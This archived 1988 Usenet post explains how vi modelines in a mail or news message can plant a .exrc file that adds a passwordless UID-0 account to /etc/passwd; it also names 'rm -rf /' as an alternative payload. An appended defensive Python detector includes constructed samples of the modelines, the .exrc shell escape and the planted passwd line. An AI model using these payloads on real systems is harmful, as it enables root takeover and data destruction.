Xref: utzoo news.sysadmin:1840 comp.unix.wizards:13215
Path: utzoo!utgpu!watmath!clyde!att!osu-cis!tut.cis.ohio-state.edu!bloom-beacon!bu-cs!encore!gloom!cory
From: cory@gloom.UUCP (Cory Kempf)
Newsgroups: news.sysadmin,comp.unix.wizards
Subject: Re: Trojan horse possible with news readers
Summary: How to break in with mail/news to root...
Message-ID: <229@gloom.UUCP>
Date: 6 Dec 88 15:39:03 GMT
References: <6775@rosevax.Rosemount.COM>
Organization: Alloy Computer Products, Framingham, Mass.
Lines: 30

A few days ago, I posted an article in which I implied that it would be
possible to get root access to a machine just by sending mail or posting an
article that was replied to. This article wasn't supposed to make it out,
but it did anyway. (Damned cancel didn't work.) Anyway, a number of people
have written asking how this worked.

The Sysadmin, while not root (UID=user), reads news/mail and replies. The
default editor is vi. The last few lines of the letter/article contain lines
of the sort <:>cmd<:>. The last of these lines causes all lines beginning
with <:> to be deleted. The rest create/modify the .exrc file in the CURRENT
working directory (if write access is allowed) to probe for write access to
/etc/passwd, and if it is allowed, include a line like
"suser::0:0:Super User:/:/bin/csh" in the /etc/passwd file.

So, when the Sysadmin su's to root and then executes vi, vi looks in the
CURRENT working directory for a file named .exrc, and executes that.

And that is how vi's modelines bug can be exploited to give root access even
if you never read news/mail as root. (NB: instead of modifying the
/etc/passwd file, it could just check the UID, and if it is 0 do an
'rm -rf / &'.)

+C
--
Cory (the last person to escape alive from riverside) Kempf
UUCP: encore.com!gloom!cory
"...it's a mistake in the making." -KT
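The post describes a three-link chain: a modeline hidden in the trailing lines of a message, a planted .exrc in the working directory, and an extra UID-0 entry in /etc/passwd. The script below is an added example, not code from the post or its author: it checks each link, given the text of a message, of a candidate .exrc, and of a passwd file. It assumes the historical "vi:cmd:" / "ex:cmd:" modeline syntax that vi scanned for in the first and last few lines of a file (the post renders the marker as <:>cmd<:>), and the sample message, .exrc and passwd contents embedded in it are constructed for the example, modelled on the post's description rather than taken from any real message.

```python
"""Checks for the three artifacts the post describes: vi/ex modelines in the
trailing lines of a mail or news article, shell escapes in a .exrc file, and
an extra UID-0 account in /etc/passwd.  Assumed syntax: the historical
'vi:cmd:' / 'ex:cmd:' modeline; samples below are constructed."""
import re

# Historical vi/ex modeline: vi, vim or ex, a colon, the command, a closing
# colon.  Old vi only looked in the first and last few lines of the file.
MODELINE_RE = re.compile(r'(?:^|\s)(?:vi|vim|ex):\s*([^:]+?)\s*:', re.IGNORECASE)

# A modeline that only sets options is the benign case; any other ex command
# (write, global delete, shell escape, source) is reported.
SET_ONLY_RE = re.compile(r'^se(?:t)?\s', re.IGNORECASE)

# .exrc lines that reach a shell: a bare '!cmd', or 'r !cmd' / 'w !cmd'.
EXRC_SHELL_RE = re.compile(r'^\s*:?\s*(?:!|(?:r|read|w|write)\s+!)')


def find_modelines(text, window=5):
    """Return [(lineno, command)] for modelines in the first and last
    `window` lines of `text`, the region vi scanned."""
    lines = text.splitlines()
    n = len(lines)
    candidates = sorted(set(range(min(window, n))) | set(range(max(0, n - window), n)))
    hits = []
    for i in candidates:
        for m in MODELINE_RE.finditer(lines[i]):
            hits.append((i + 1, m.group(1)))
    return hits


def suspicious_modelines(text, window=5):
    """Modelines whose command is anything other than a plain 'set'."""
    return [(ln, cmd) for ln, cmd in find_modelines(text, window)
            if not SET_ONLY_RE.match(cmd)]


def exrc_shell_escapes(exrc_text):
    """Line numbers in a .exrc that run a shell command when vi starts."""
    return [i + 1 for i, line in enumerate(exrc_text.splitlines())
            if EXRC_SHELL_RE.match(line)]


def extra_uid0_accounts(passwd_text):
    """Usernames in passwd-format text with UID 0 that are not 'root'."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(':')
        if len(fields) < 7:
            continue  # not a well-formed passwd entry
        name, uid = fields[0], fields[2]
        if uid == '0' and name != 'root':
            found.append(name)
    return found


def audit(message_text, exrc_text, passwd_text):
    """Run all three checks and return the findings as a dict."""
    return {
        'modelines': suspicious_modelines(message_text),
        'exrc_escapes': exrc_shell_escapes(exrc_text),
        'extra_uid0': extra_uid0_accounts(passwd_text),
    }


# Constructed sample message: innocuous body, modelines in the last lines.
# Line 8 writes part of the buffer to .exrc, line 9 deletes the marker lines.
SAMPLE_MESSAGE = """Subject: Re: your question

Sure, the config you want is below.

Regards,
C.
vi:set ts=8:
vi:1,2w! .exrc:
vi:g/^vi/d:
"""

# Constructed .exrc matching the post's description: probe for write access
# to /etc/passwd and append a UID-0 entry if it is writable.
SAMPLE_EXRC = """set ts=8
!sh -c 'test -w /etc/passwd && echo "suser::0:0:Super User:/:/bin/csh" >> /etc/passwd'
"""

# Constructed passwd file with the planted entry from the post.
SAMPLE_PASSWD = """root:x:0:0:root:/:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
cory:x:100:100:Cory Kempf:/usr/cory:/bin/csh
suser::0:0:Super User:/:/bin/csh
"""

if __name__ == '__main__':
    for check, result in audit(SAMPLE_MESSAGE, SAMPLE_EXRC, SAMPLE_PASSWD).items():
        print(check, result)
```

The message scan deliberately covers only the window vi read, so a "vi:" in the middle of a long article is not reported; widen `window` if a different editor build is in play. The passwd check is the one worth running on a schedule independently of this bug, since any route to a stray UID-0 entry shows up there.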